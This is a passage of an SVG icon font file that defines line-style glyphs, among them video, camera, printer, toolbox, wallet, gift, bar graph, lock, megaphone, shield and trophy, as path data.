48h-29.344c-8.832 0-16-7.168-16-16s7.168-16 16-16h29.344c8.8 0 16-7.168 16-16v-832c0-8.832-7.2-16-16-16h-832c-8.8 0-16 7.168-16 16v29.344c0 8.832-7.168 16-16 16z" />
<glyph unicode="&#xe011;" glyph-name="video" horiz-adv-x="1184" d="M240 960h-192c-27.808 0-48-20.192-48-48v-928c0-27.808 20.192-48 48-48h1088c27.808 0 48 20.192 48 48v928c0 27.808-20.192 48-48 48h-896zM32-16v928c0 10.016 5.984 16 16 16h176v-960h-176c-10.016 0-16 5.984-16 16zM256-32v960h672v-960h-672zM1152 912v-928c0-10.016-5.984-16-16-16h-176v960h176c10.016 0 16-5.984 16-16zM472.864 637.312c-4.896 3.264-11.232 3.584-16.448 0.8-5.152-2.784-8.416-8.192-8.416-14.112v-384c0-5.92 3.264-11.328 8.448-14.112 2.368-1.248 4.96-1.888 7.552-1.888 3.104 0 6.176 0.896 8.864 2.688l288 192c4.448 2.976 7.136 7.968 7.136 13.312s-2.688 10.336-7.136 13.312l-288 192zM480 269.888v324.224l243.168-162.112-243.168-162.112zM160 704h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16zM96 800h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM160 576h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16zM160 448h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16zM160 320h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16zM160 192h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16zM160 64h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1024 672h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM1024 800h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM1024 544h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM1024 416h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM1024 288h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM1024 160h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16zM1088 64h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16z" />
<glyph unicode="&#xe012;" glyph-name="camera2" horiz-adv-x="1344" d="M1264 768h-240c-61.664 0-63.936 57.504-64 64v32c0 40.256-44.48 96-128 96h-319.008c-93.92 0-128-57.408-128-96v-31.808c-0.032-2.624-1.536-64.192-64.992-64.192h-240c-44.128 0-80-35.904-80-80v-576c0-44.096 35.872-80 80-80h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-26.464 0-48 21.536-48 48v400h256c-20.608-49.28-32-103.328-32-160 0-229.376 186.624-416 416-416s416 186.624 416 416c0 56.672-11.488 110.72-32.096 160h256.096v-400c0-26.464-21.536-48-48-48h-224c-8.832 0-16-7.168-16-16s7.168-16 16-16h224c44.128 0 80 35.904 80 80v576c0 44.096-35.872 80-80 80zM672-32c-211.744 0-384 172.256-384 384s172.256 384 384 384 384-172.256 384-384-172.256-384-384-384zM1048 544c-2.368 0-4.576-0.576-6.592-1.504-69.248 133.728-208.704 225.504-369.408 225.504s-300.16-91.776-369.408-225.504c-2.016 0.928-4.224 1.504-6.592 1.504h-264v144c0 26.464 21.536 48 48 48h240c75.776 0 96.608 62.656 96.992 96v32c0 25.728 25.568 64 96 64h319.008c67.008 0 96-42.368 96-64v-32c0-33.216 20.064-96 96-96h240c26.464 0 48-21.536 48-48v-144h-264zM304 800c8.832 0 16 7.168 16 16v32c0 26.464-21.536 48-48 48h-128c-26.464 0-48-21.536-48-48v-32c0-8.832 7.168-16 16-16s16 7.168 16 16v32c0 8.832 7.2 16 16 16h128c8.8 0 16-7.168 16-16v-32c0-8.832 7.168-16 16-16zM672 640c-158.816 0-288-129.216-288-288s129.184-288 288-288 288 129.216 288 288-129.184 288-288 288zM672 96c-141.152 0-256 114.848-256 256s114.848 256 256 256 256-114.848 256-256-114.848-256-256-256z" />
<glyph unicode="&#xe013;" glyph-name="printer2" horiz-adv-x="1344" d="M1296 640h-80v112c0 26.464-21.536 48-48 48h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h64c8.8 0 16-7.168 16-16v-112h-128v304c0 8.832-7.168 16-16 16h-736c-8.832 0-16-7.168-16-16v-304h-128v112c0 8.832 7.2 16 16 16h64c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-26.464 0-48-21.536-48-48v-112h-80c-26.464 0-48-21.536-48-48v-448c0-26.464 21.536-48 48-48h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.8 0-16 7.168-16 16v112h1280v-112c0-8.832-7.2-16-16-16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16h192c26.464 0 48 21.536 48 48v448c0 26.464-21.536 48-48 48zM320 928h704v-288h-704v288zM32 288v304c0 8.832 7.2 16 16 16h1248c8.8 0 16-7.168 16-16v-304h-1280zM1040 224c-8.832 0-16-7.168-16-16v-240h-704v240c0 8.832-7.168 16-16 16s-16-7.168-16-16v-256c0-8.832 7.168-16 16-16h736c8.832 0 16 7.168 16 16v256c0 8.832-7.168 16-16 16zM1184 384c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM1056 384c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32z" />
<glyph unicode="&#xe014;" glyph-name="toolbox" horiz-adv-x="1344" d="M1328 416c-8.832 0-16-7.168-16-16v-416c0-8.832-7.168-16-16-16h-1248c-8.832 0-16 7.168-16 16v416c0 8.832-7.168 16-16 16s-16-7.168-16-16v-416c0-26.464 21.536-48 48-48h1248c26.464 0 48 21.536 48 48v416c0 8.832-7.168 16-16 16zM1296 736h-1248c-26.464 0-48-21.536-48-48v-192c0-8.832 7.168-16 16-16h432v-112c0-26.464 21.536-48 48-48h352c26.464 0 48 21.536 48 48v112h432c8.832 0 16 7.168 16 16v192c0 26.464-21.536 48-48 48zM864 368c0-8.832-7.168-16-16-16h-352c-8.832 0-16 7.168-16 16v112h384v-112zM1312 512h-1280v176c0 8.832 7.168 16 16 16h1248c8.832 0 16-7.168 16-16v-176zM496 960c-26.464 0-48-21.536-48-48v-128c0-8.832 7.168-16 16-16s16 7.168 16 16v128c0 8.832 7.168 16 16 16h352c8.832 0 16-7.168 16-16v-128c0-8.832 7.168-16 16-16s16 7.168 16 16v128c0 26.464-21.536 48-48 48h-352z" />
<glyph unicode="&#xe015;" glyph-name="briefcase2" horiz-adv-x="1216" d="M1200 384c-8.832 0-16-7.168-16-16v-384c0-8.832-7.168-16-16-16h-1120c-8.832 0-16 7.168-16 16v384c0 8.832-7.168 16-16 16s-16-7.168-16-16v-384c0-26.464 21.536-48 48-48h1120c26.464 0 48 21.536 48 48v384c0 8.832-7.168 16-16 16zM816 800c8.832 0 16 7.168 16 16v96c0 26.464-21.536 48-48 48h-352c-26.464 0-48-21.536-48-48v-96c0-8.832 7.168-16 16-16s16 7.168 16 16v96c0 8.832 7.168 16 16 16h352c8.832 0 16-7.168 16-16v-96c0-8.832 7.168-16 16-16zM1168 736h-1120c-26.464 0-48-21.536-48-48v-158.656c0-88.896 302.592-208 612-208 305.376 0 604 119.104 604 208v158.656c0 26.464-21.536 48-48 48zM1184 529.344c0-56.448-270.624-176-572-176-305.6 0-580 119.52-580 176v158.656c0 8.832 7.168 16 16 16h1120c8.832 0 16-7.168 16-16v-158.656zM612 224c30.176 0 61.536 1.248 93.248 3.712 8.8 0.672 15.392 8.384 14.688 17.216-0.672 8.8-8.064 15.552-17.216 14.688-64.448-5.024-125.088-4.8-189.408 0.64-8.448 0.864-16.544-5.792-17.28-14.592s5.792-16.544 14.592-17.28c34.432-2.912 68.544-4.384 101.376-4.384z" />
<glyph unicode="&#xe016;" glyph-name="wallet" horiz-adv-x="1216" d="M1040.288 720c8.832 0 16 7.168 16 16v53.28c0 28.896-23.52 52.416-52.416 52.416h-85.984l-19.616 57.888c-2.752 8.16-11.52 12.704-19.808 10.176l-465.696-141.568c-8.448-2.592-13.216-11.52-10.656-19.968 2.112-6.912 8.448-11.328 15.328-11.328 1.536 0 3.104 0.224 4.672 0.672l450.848 137.088 42.976-126.88c2.848-8.384 12-12.928 20.288-10.016 8.384 2.816 12.864 11.936 10.016 20.288l-17.504 51.68h75.168c11.264 0 20.416-9.152 20.416-20.416v-53.312c-0.032-8.832 7.136-16 15.968-16zM1168 480c-8.832 0-16-7.168-16-16s7.168-16 16-16c11.232 0 16-4.768 16-16v-192c0-11.232-4.768-16-16-16h-256c-11.232 0-16 4.768-16 16v160c0 11.232 4.768 16 16 16h192c8.832 0 16 7.168 16 16v192c0 29.152-18.848 48-48 48h-976c-39.456 0-64 24.544-64 64s24.544 64 64 64h162.432l-96.832-31.936c-8.384-2.752-12.96-11.808-10.208-20.192 2.208-6.72 8.48-10.976 15.2-10.976 1.664 0 3.328 0.256 5.024 0.8l579.808 191.136c8.384 2.784 12.96 11.808 10.176 20.224-2.752 8.384-11.808 12.96-20.224 10.176l-387.2-127.68c-0.736 0.128-1.408 0.448-2.176 0.448h-256c-57.408 0-96-38.592-96-96v-704c0-57.408 38.592-96 96-96h976c29.152 0 48 18.848 48 48v160c0 8.832-7.168 16-16 16s-16-7.168-16-16v-160c0-11.232-4.768-16-16-16h-976c-39.456 0-64 24.544-64 64v630.016c16.416-13.856 38.144-22.016 64-22.016h976c11.232 0 16-4.768 16-16v-176h-176c-29.152 0-48-18.848-48-48v-160c0-29.152 18.848-48 48-48h256c29.152 0 48 18.848 48 48v192c0 29.152-18.848 48-48 48zM992 320c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32z" />
<glyph unicode="&#xe017;" glyph-name="gift2" horiz-adv-x="1344" d="M48 416c-8.832 0-16-7.168-16-16v-384c0-26.464 21.536-48 48-48h320c8.832 0 16 7.168 16 16s-7.168 16-16 16h-320c-8.832 0-16 7.168-16 16v384c0 8.832-7.168 16-16 16zM1296 416c-8.832 0-16-7.168-16-16v-384c0-8.832-7.168-16-16-16h-672c-8.832 0-16-7.168-16-16s7.168-16 16-16h672c26.464 0 48 21.536 48 48v384c0 8.832-7.168 16-16 16zM576 912c0-8.832 7.168-16 16-16h672c8.832 0 16-7.168 16-16v-286.656c0-8.832 7.168-16 16-16s16 7.168 16 16v286.656c0 26.464-21.536 48-48 48h-672c-8.832 0-16-7.168-16-16zM80 928c-26.464 0-48-21.536-48-48v-286.656c0-8.832 7.168-16 16-16s16 7.168 16 16v286.656c0 8.832 7.168 16 16 16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16h-320zM1328 513.344h-652.8c12.704 5.632 23.68 12.192 31.488 20 48.352 48.352 48.352 127.008 0 175.36-46.848 46.848-128.512 46.848-175.36 0-7.52-7.52-13.824-18.016-19.328-30.080v265.376c0 8.832-7.168 16-16 16s-16-7.168-16-16v-423.2c-54.496 22.464-150.432 68.608-170.112 108.384-12.8 25.856-14.752 55.104-5.536 82.432 9.248 27.328 28.544 49.376 54.368 62.176 7.936 3.936 11.168 13.504 7.264 21.44-3.968 7.936-13.504 11.2-21.44 7.264-33.504-16.576-58.528-45.216-70.496-80.64s-9.408-73.376 7.168-106.848c19.36-39.104 84.16-76.512 136.8-101.664h-402.016c-8.832 0-16-7.168-16-16s7.168-16 16-16h299.072c-12.384-5.568-23.104-12-30.752-19.648-48.352-48.352-48.352-127.008 0-175.36 23.424-23.424 54.56-36.32 87.68-36.32s64.256 12.896 87.68 36.32c7.936 7.936 14.592 19.168 20.32 32.16v-366.496c0-8.832 7.168-16 16-16s16 7.168 16 16v521.76c54.656-22.592 149.536-68.416 169.12-107.968 12.8-25.856 14.752-55.104 5.536-82.432-9.248-27.328-28.544-49.376-54.368-62.176-7.936-3.936-11.168-13.504-7.264-21.44 2.784-5.632 8.48-8.896 14.368-8.896 2.368 0 4.8 0.544 7.072 1.664 33.504 16.576 58.528 45.216 70.496 80.64s9.408 73.344-7.168 106.848c-19.264 38.912-83.552 76.16-136.064 101.344h754.272c8.832 0 16 7.168 16 16s-7.168 16-16 16zM553.952 686.048c17.376 17.376 40.48 26.944 65.056 26.944s47.68-9.568 65.056-26.944c35.872-35.872 35.872-94.24 0-130.112-27.328-27.328-121.28-38.464-171.744-41.6 3.584 59.648 16.704 146.784 41.632 171.712zM437.056 308.96c-34.752-34.752-95.36-34.752-130.112 0-35.872 35.872-35.872 94.24 0 130.112 27.328 27.328 121.28 38.464 171.744 41.6-3.584-59.648-16.704-146.784-41.632-171.712z" />
<glyph unicode="&#xe018;" glyph-name="bargraph" horiz-adv-x="1152" d="M832 624v-640c0-5.632 1.152-10.976 2.944-16h-101.888c1.792 5.024 2.944 10.368 2.944 16v928c0 26.464-21.536 48-48 48h-224c-26.464 0-48-21.536-48-48v-928c0-5.632 1.152-10.976 2.944-16h-101.888c1.792 5.024 2.944 10.368 2.944 16v352c0 26.464-21.536 48-48 48h-224c-26.464 0-48-21.536-48-48v-352c0-26.464 21.536-48 48-48h1056c26.464 0 48 21.536 48 48v640c0 26.464-21.536 48-48 48h-224c-26.464 0-48-21.536-48-48zM160-32h-112c-8.8 0-16 7.168-16 16v352c0 8.832 7.2 16 16 16h224c8.8 0 16-7.168 16-16v-352c0-8.832-7.2-16-16-16h-112zM464-32c-8.8 0-16 7.168-16 16v928c0 8.832 7.2 16 16 16h224c8.8 0 16-7.168 16-16v-928c0-8.832-7.2-16-16-16h-224zM1120 624v-640c0-8.832-7.2-16-16-16h-224c-8.8 0-16 7.168-16 16v640c0 8.832 7.2 16 16 16h224c8.8 0 16-7.168 16-16z" />
<glyph unicode="&#xe019;" glyph-name="grid" horiz-adv-x="992" d="M912 608c8.832 0 16 7.168 16 16s-7.168 16-16 16h-240v240c0 8.832-7.168 16-16 16s-16-7.168-16-16v-240h-288v240c0 8.832-7.168 16-16 16s-16-7.168-16-16v-240h-240c-8.832 0-16-7.168-16-16s7.168-16 16-16h240v-288h-240c-8.832 0-16-7.168-16-16s7.168-16 16-16h240v-272c0-8.832 7.168-16 16-16s16 7.168 16 16v272h288v-272c0-8.832 7.168-16 16-16s16 7.168 16 16v272h240c8.832 0 16 7.168 16 16s-7.168 16-16 16h-240v288h240zM640 320h-288v288h288v-288zM992-16v928c0 26.464-21.536 48-48 48h-896c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48h896c26.464 0 48 21.536 48 48zM32-16v928c0 8.832 7.2 16 16 16h896c8.8 0 16-7.168 16-16v-928c0-8.832-7.2-16-16-16h-896c-8.8 0-16 7.168-16 16z" />
<glyph unicode="&#xe01a;" glyph-name="expand" d="M1024-16v928c0 26.464-21.536 48-48 48h-928c-26.464 0-48-21.536-48-48v-288c0-8.832 7.168-16 16-16s16 7.168 16 16v288c0 8.832 7.2 16 16 16h928c8.8 0 16-7.168 16-16v-928c0-8.832-7.2-16-16-16h-288c-8.832 0-16-7.168-16-16s7.168-16 16-16h288c26.464 0 48 21.536 48 48zM48 544c-26.464 0-48-21.536-48-48v-512c0-26.464 21.536-48 48-48h512c26.464 0 48 21.536 48 48v537.376l224 224v-217.376c0-8.832 7.168-16 16-16s16 7.168 16 16v256c0 8.832-7.168 16-16 16h-256c-8.832 0-16-7.168-16-16s7.168-16 16-16h217.344l-224-224h-537.344zM576-16c0-8.832-7.2-16-16-16h-512c-8.8 0-16 7.168-16 16v512c0 8.832 7.2 16 16 16h528v-528z" />
<glyph unicode="&#xe01b;" glyph-name="focus" horiz-adv-x="1344" d="M272 960h-224c-26.464 0-48-21.536-48-48v-192c0-8.832 7.168-16 16-16s16 7.168 16 16v192c0 8.832 7.2 16 16 16h224c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1296 960h-224c-8.832 0-16-7.168-16-16s7.168-16 16-16h224c8.8 0 16-7.168 16-16v-192c0-8.832 7.168-16 16-16s16 7.168 16 16v192c0 26.464-21.536 48-48 48zM1328 192c-8.832 0-16-7.168-16-16v-192c0-8.832-7.2-16-16-16h-224c-8.832 0-16-7.168-16-16s7.168-16 16-16h224c26.464 0 48 21.536 48 48v192c0 8.832-7.168 16-16 16zM16 192c-8.832 0-16-7.168-16-16v-192c0-26.464 21.536-48 48-48h224c8.832 0 16 7.168 16 16s-7.168 16-16 16h-224c-8.8 0-16 7.168-16 16v192c0 8.832-7.168 16-16 16zM752 352c8.832 0 16 7.168 16 16v160c0 8.832-7.168 16-16 16h-160c-8.832 0-16-7.168-16-16v-160c0-8.832 7.168-16 16-16h160zM608 512h128v-128h-128v128z" />
<glyph unicode="&#xe01c;" glyph-name="edit" d="M48-64h928c26.464 0 48 21.536 48 48v928c0 26.464-21.536 48-48 48h-928c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM32 912c0 8.832 7.2 16 16 16h928c8.8 0 16-7.168 16-16v-928c0-8.832-7.2-16-16-16h-928c-8.8 0-16 7.168-16 16v928zM128 48.672c1.536 0 3.072 0.224 4.576 0.672l320 95.328c2.592 0.768 4.928 2.176 6.816 4.064l322.88 326.56c0.736 0.768 1.12 1.696 1.664 2.56l117.056 117.056c19.424 19.424 19.424 51.040 0 70.496l-167.552 167.488c-19.424 19.424-51.040 19.456-70.464 0l-119.648-119.648c-0.768-0.768-1.152-1.728-1.728-2.592l-323.776-323.808c-1.792-1.792-3.136-3.968-3.904-6.368l-101.12-310.88c-1.856-5.664-0.384-11.872 3.744-16.128 3.040-3.104 7.2-4.8 11.456-4.8zM555.488 679.328l33.28-33.28-272.736-274.016-55.264 12.544 294.72 294.752zM336 346.72l275.424 276.672 77.888-77.888-279.84-273.504h-73.472v74.72zM748.32 486.496l-295.872-299.264-18.432 63.968 277.888 271.648 36.416-36.352zM239.776 356.512l64.224-14.592v-85.92c0-8.832 7.168-16 16-16h83.968l20.256-70.4-271.584-80.896 87.136 267.808zM685.6 810.272c6.976 6.944 18.304 6.912 25.216 0l167.52-167.52c6.976-6.944 6.976-18.272 0-25.248l-107.904-107.904-192.736 192.736 107.904 107.936z" />
<glyph unicode="&#xe01d;" glyph-name="adjustments" horiz-adv-x="1056" d="M992 960h-928c-26.304 0-64-37.696-64-64v-896c0-26.304 37.696-64 64-64h928c26.304 0 64 37.696 64 64v896c0 26.304-37.696 64-64 64zM1024 0c-0.192-9.088-22.912-31.808-32-32h-928c-9.088 0.192-31.808 22.912-32 32v896c0.192 9.088 22.912 31.808 32 32h928c9.088-0.192 31.808-22.912 32-32v-896zM528 784c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM528 688c-17.632 0-32 14.368-32 32s14.368 32 32 32 32-14.368 32-32-14.368-32-32-32zM784 272c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM784 176c-17.632 0-32 14.368-32 32s14.368 32 32 32 32-14.368 32-32-14.368-32-32-32zM272 432c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM272 336c-17.632 0-32 14.368-32 32s14.368 32 32 32 32-14.368 32-32-14.368-32-32-32zM272 480c8.832 0 16 7.168 16 16v288c0 8.832-7.168 16-16 16s-16-7.168-16-16v-288c0-8.832 7.168-16 16-16zM272 256c-8.832 0-16-7.168-16-16v-96c0-8.832 7.168-16 16-16s16 7.168 16 16v96c0 8.832-7.168 16-16 16zM528 608c-8.832 0-16-7.168-16-16v-448c0-8.832 7.168-16 16-16s16 7.168 16 16v448c0 8.832-7.168 16-16 16zM784 320c8.832 0 16 7.168 16 16v448c0 8.832-7.168 16-16 16s-16-7.168-16-16v-448c0-8.832 7.168-16 16-16z" />
<glyph unicode="&#xe01e;" glyph-name="ribbon" horiz-adv-x="896" d="M48 672c-8.832 0-16-7.168-16-16v-670.272c0-21.28 10.112-33.248 18.624-39.52 10.176-7.552 22.144-10.208 32.832-10.208 6.432 0 12.384 0.96 17.216 2.464 93.728 28.64 299.040 239.424 351.136 294.080 50.784-54.976 249.76-265.44 343.488-294.080 12.928-3.968 33.76-4.32 50.048 7.776 8.544 6.272 18.656 18.208 18.656 39.488v670.272c0 8.832-7.168 16-16 16s-16-7.168-16-16v-670.272c0-8.64-3.232-12-5.664-13.792-5.696-4.224-15.488-4.8-21.664-2.912-97.28 29.728-338.4 295.040-340.8 297.696-3.008 3.328-7.264 5.248-11.744 5.28-4.064 0.032-8.736-1.792-11.808-5.088-2.496-2.656-251.584-268.096-348.992-297.888-6.144-1.888-15.968-1.312-21.664 2.912-2.432 1.792-5.664 5.184-5.664 13.792v670.272c0 8.832-7.168 16-16 16zM896 752v160c0 26.464-21.536 48-48 48h-800c-26.464 0-48-21.536-48-48v-160c0-8.832 7.168-16 16-16h864c8.832 0 16 7.168 16 16zM864 768h-832v144c0 8.832 7.168 16 16 16h800c8.832 0 16-7.168 16-16v-144z" />
<glyph unicode="&#xe01f;" glyph-name="hourglass" horiz-adv-x="672" d="M672.672 944c0 8.832-7.168 16-16 16h-641.344c-8.832 0-16-7.168-16-16s7.136-16 16-16h641.376c8.832 0 15.968 7.168 15.968 16zM640 764.416v115.584c0 8.832-7.168 16-16 16h-573.376c-8.832 0-16-7.168-16-16v-115.584c0-159.232 121.856-267.2 192.448-316.352-80.928-55.744-195.072-161.824-195.072-316.48v-115.584c0-8.832 7.168-16 16-16h576c8.832 0 16 7.168 16 16v114.656c0 158.784-123.616 267.68-195.040 317.312 80.928 55.744 195.040 161.792 195.040 316.448zM336 185.92l153.92-153.92h-307.84l153.92 153.92zM407.424 461.504c-4.64-2.912-7.424-8.032-7.424-13.504s2.784-10.592 7.424-13.504c60.32-38.24 200.576-144.416 200.576-303.84v-98.656h-73.216c-0.288 0.352-0.416 0.8-0.736 1.12l-182.048 182.048v24.832c0 8.832-7.168 16-16 16s-16-7.168-16-16v-24.832l-182.048-182.048c-0.32-0.32-0.448-0.768-0.736-1.12h-73.216v99.584c0 152.864 125.664 255.392 200.576 302.88 4.64 2.944 7.424 8.064 7.424 13.536s-2.784 10.592-7.424 13.504c-59.52 37.76-200.576 142.816-200.576 302.912v99.584h544v-99.584c0-152.896-125.664-255.392-200.576-302.912zM497.312 672.896h-314.048c-5.728 0-11.040-3.072-13.888-8.032-2.848-4.992-2.816-11.104 0.064-16.064 37.984-64.672 93.44-104.256 152.16-146.208l5.088-3.616c2.784-1.984 6.016-2.976 9.312-2.976s6.528 0.992 9.312 2.976c8.384 5.984 16.832 11.872 25.28 17.76 52.448 36.608 106.688 74.432 140.512 132.064 2.912 4.928 2.944 11.072 0.096 16.032-2.88 4.992-8.16 8.064-13.888 8.064zM352.256 543.008c-5.408-3.776-10.816-7.552-16.224-11.36-48.16 34.4-90.72 65.344-123.072 109.28h254.176c-30.112-38.784-71.488-67.648-114.88-97.92zM15.328-64h641.376c8.832 0 16 7.168 16 16s-7.168 16-16 16h-641.376c-8.832 0-16-7.168-16-16s7.136-16 16-16zM336 352c-8.832 0-16-7.168-16-16v-32c0-8.832 7.168-16 16-16s16 7.168 16 16v32c0 8.832-7.168 16-16 16zM336 448c-8.832 0-16-7.168-16-16v-32c0-8.832 7.168-16 16-16s16 7.168 16 16v32c0 8.832-7.168 16-16 16z" />
<glyph unicode="&#xe020;" glyph-name="lock2" horiz-adv-x="896" d="M448 960c-176.448 0-320-143.552-320-320v-96h-48c-44.096 0-80-35.904-80-80v-448c0-44.096 35.904-80 80-80h736c44.096 0 80 35.904 80 80v448c0 44.096-35.904 80-80 80h-48v96c0 176.448-143.552 320-320 320zM160 640c0 158.784 129.216 288 288 288s288-129.216 288-288v-96h-96v96c0 105.888-86.112 192-192 192s-192-86.112-192-192v-96h-96v96zM608 544h-320v96c0 88.224 71.776 160 160 160s160-71.776 160-160v-96zM393.376 288l-160-160h-146.752l160 160h146.752zM585.376 288l-160-160h-146.752l160 160h146.752zM777.376 288l-160-160h-146.752l160 160h146.752zM864 288v-160h-201.376l160 160h41.376zM41.376 128h-9.376v160h169.376l-160-160zM816-32h-736c-26.464 0-48 21.536-48 48v80h832v-80c0-26.464-21.536-48-48-48zM864 464v-144h-832v144c0 26.464 21.536 48 48 48h736c26.464 0 48-21.536 48-48z" />
<glyph unicode="&#xe021;" glyph-name="megaphone" horiz-adv-x="1280" d="M1263.936 960c-8.864 0-15.936-7.168-15.936-16v-992c0-8.832 7.072-16 15.936-16s16 7.168 16 16v992c0 8.832-7.168 16-16 16zM1206.944 921.472c-5.44 2.656-12.032 1.984-16.832-1.76l-18.080-14.24c-95.296-75.36-254.688-201.472-580.032-201.472h-443.808c-46.432 0-84.192-38.4-84.192-85.568v-342.848c0-46.080 37.76-83.584 84.192-83.584h108.608c2.816-36 16.064-121.408 78.528-184.352 47.168-47.552 112-71.648 192.672-71.648 8.832 0 16 7.168 16 16s-7.168 16-16 16c-71.744 0-128.832 20.864-169.792 62.016-53.344 53.632-66.144 128.768-69.216 161.984h95.84c2.72-21.824 11.52-60.192 40.768-89.664 25.248-25.44 59.712-38.336 102.4-38.336 8.832 0 16 7.168 16 16s-7.168 16-16 16c-33.76 0-60.512 9.664-79.488 28.672-21.024 21.088-28.608 49.472-31.392 67.328h172.672c326.912 0 487.584-126.816 583.584-202.592l16.704-13.152c2.848-2.24 6.336-3.36 9.824-3.36 2.4 0 4.8 0.544 7.008 1.632 5.504 2.688 8.992 8.256 8.992 14.368v918.208c0.032 6.112-3.456 11.68-8.96 14.368zM96 275.584v342.848c0 29.536 23.392 53.568 52.192 53.568h107.808v-448h-107.808c-29.28 0-52.192 22.656-52.192 51.584zM1184 21.856c-100.288 78.912-266.496 202.144-594.176 202.144h-185.504c-1.504 0.48-3.040 0.96-4.736 0.992-0.032 0-0.032 0-0.064 0-1.728 0-3.36-0.48-4.928-0.992h-106.592v448h304c327.584 0 492.608 123.648 592 202.112v-852.256zM16 260.576c8.832 0 16 7.168 16 16v342.848c0 8.832-7.168 16-16 16s-16-7.136-16-16v-342.848c0-8.832 7.168-16 16-16z" />
<glyph unicode="&#xe022;" glyph-name="shield2" horiz-adv-x="864" d="M432 960c-285.984 0-422.656-161.504-428.352-168.384-2.336-2.88-3.648-6.464-3.648-10.208v-321.728c0-272.128 250.432-433.696 358.080-490.528 7.808-4.128 17.472-1.12 21.632 6.688 4.128 7.808 1.12 17.504-6.688 21.632-127.36 67.232-341.024 216.672-341.024 462.24v315.616c22.464 24.16 148.224 147.104 384 152.48v-975.808c0-8.832 7.168-16 16-16 4.768 0 9.056 2.080 12 5.408 52.384 22.528 420 192.48 420 522.592v320c0 3.744-1.312 7.36-3.68 10.208-4.736 5.728-118.848 140-356.512 163.968-8.8 0.608-16.672-5.536-17.536-14.304-0.896-8.8 5.536-16.64 14.304-17.536 201.184-20.288 310.496-126.24 331.424-148.48v-313.856c0-286.464-299.616-446.368-384-485.728v965.728c0 8.832-7.168 16-16 16z" />
<glyph unicode="&#xe023;" glyph-name="trophy2" horiz-adv-x="1088" d="M816 928c8.832 0 16 7.168 16 16s-7.168 16-16 16h-544c-8.832 0-16-7.168-16-16s7.168-16 16-16h544zM816 896h-608c-105.056 0-154.016-37.312-176.608-68.608-27.648-38.4-32.832-89.696-14.592-144.448 28.224-84.672 123.072-186.4 181.376-231.584 2.944-2.272 6.4-3.36 9.824-3.36 4.768 0 9.504 2.112 12.672 6.208 5.408 6.976 4.128 17.024-2.848 22.464-53.568 41.472-144.8 138.944-170.624 216.416-14.944 44.704-11.328 85.76 10.176 115.584 26.080 36.192 78.144 55.328 150.624 55.328h48v-304c0-215.232 213.536-339.232 257.152-362.304-0.672-1.792-1.152-3.68-1.152-5.696v-80c0-8.832 7.168-16 16-16s16 7.168 16 16v80c0 1.856-0.48 3.584-1.056 5.248 48.448 22.784 289.056 146.752 289.056 362.752v304h48c72.48 0 124.544-19.136 150.624-55.328 21.504-29.824 25.12-70.88 10.176-115.616-20.16-60.512-120.608-177.696-170.624-216.416-6.976-5.408-8.256-15.456-2.848-22.464 3.168-4.064 7.904-6.176 12.672-6.176 3.424 0 6.88 1.088 9.824 3.328 55.424 42.944 158.752 163.808 181.376 231.584 18.24 54.752 13.056 106.048-14.592 144.448-22.592 31.328-71.552 68.64-176.608 68.64h-64zM800 560c0-194.976-228.864-313.728-271.552-334.176-39.296 21.28-240.448 139.744-240.448 334.176v304h512v-304zM352 64c-36.512 0-64-27.52-64-64v-48c0-8.832 7.168-16 16-16h448c8.832 0 16 7.168 16 16v45.6c0 37.216-28.128 66.4-64 66.4h-352zM736-2.4v-29.6h-416v32c0 18.848 13.152 32 32 32h352c18.24 0 32-14.784 32-34.4z" />
